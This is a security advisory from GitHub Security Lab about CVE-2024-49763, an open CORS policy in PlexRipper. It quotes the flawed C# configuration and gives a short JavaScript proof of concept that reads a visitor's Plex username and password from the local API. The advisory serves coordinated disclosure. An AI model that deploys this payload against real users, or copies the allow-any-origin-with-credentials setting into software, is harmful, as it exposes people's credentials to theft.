GHSL-2024-305: Information disclosure via PlexRipper’s open CORS policy - CVE-2024-49763

Coordinated Disclosure Timeline

• 2024-10-17: Vulnerability report submitted via Private Vulnerability Reporting.
• 2024-10-18: Vulnerability fixed in patch

Summary

PlexRipper’s open CORS policy allows attackers to gain sensitive information from PlexRipper by getting the user to access the attacker’s domain.

Project

PlexRipper

Tested Version

0.23.2

Details

API leak due to open CORS policy (GHSL-2024-305)

PlexRipper allows all websites to make cross site requests. This allows an attacking website to access the /api/PlexAccount endpoint and steal the user’s Plex login.

    public static void ConfigureServices(this IServiceCollection services, IWebHostEnvironment env)
    {
        // Set CORS Configuration
        services.AddCors(options =>
        {
            options.AddPolicy(
                CORSConfiguration,
                builder =>
                {
                    // TODO CORS disabled, otherwise its not working when deployed in a docker container
                    // Solution?
                    builder
                        .AllowAnyHeader()
                        .AllowAnyMethod()
                        // The combo all origin is allowed with allow credentials is needed to make SignalR work from the client.
                        .SetIsOriginAllowed(_ => true)
                        .AllowCredentials();
                }
            );
        });

Impact

This issue may lead to Information Disclosure.

Proof Of Concept

If an attacker hosts the following javascript on their website attacker.com, any PlexRipper user visiting attacker.com may have their credentials stolen. In this proof of concept we print the user’s Plex username and password.

<script>
fetch("http://localhost:8989/api/PlexAccount", {
    method: "GET",
})
.then(response => {
    if (!response.ok) {
        throw new Error('Network response was not ok ' + response.statusText);
    }
    return response.json();
})
.then(data => alert("Plex Username: " + data.value[0]["username"] + " Plex Password: " + data.value[0]["password"])) 
.catch(error => console.error('There was a problem with your fetch operation:', error));
</script>

CVE

• CVE-2024-49763

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-305 in any communication regarding this issue.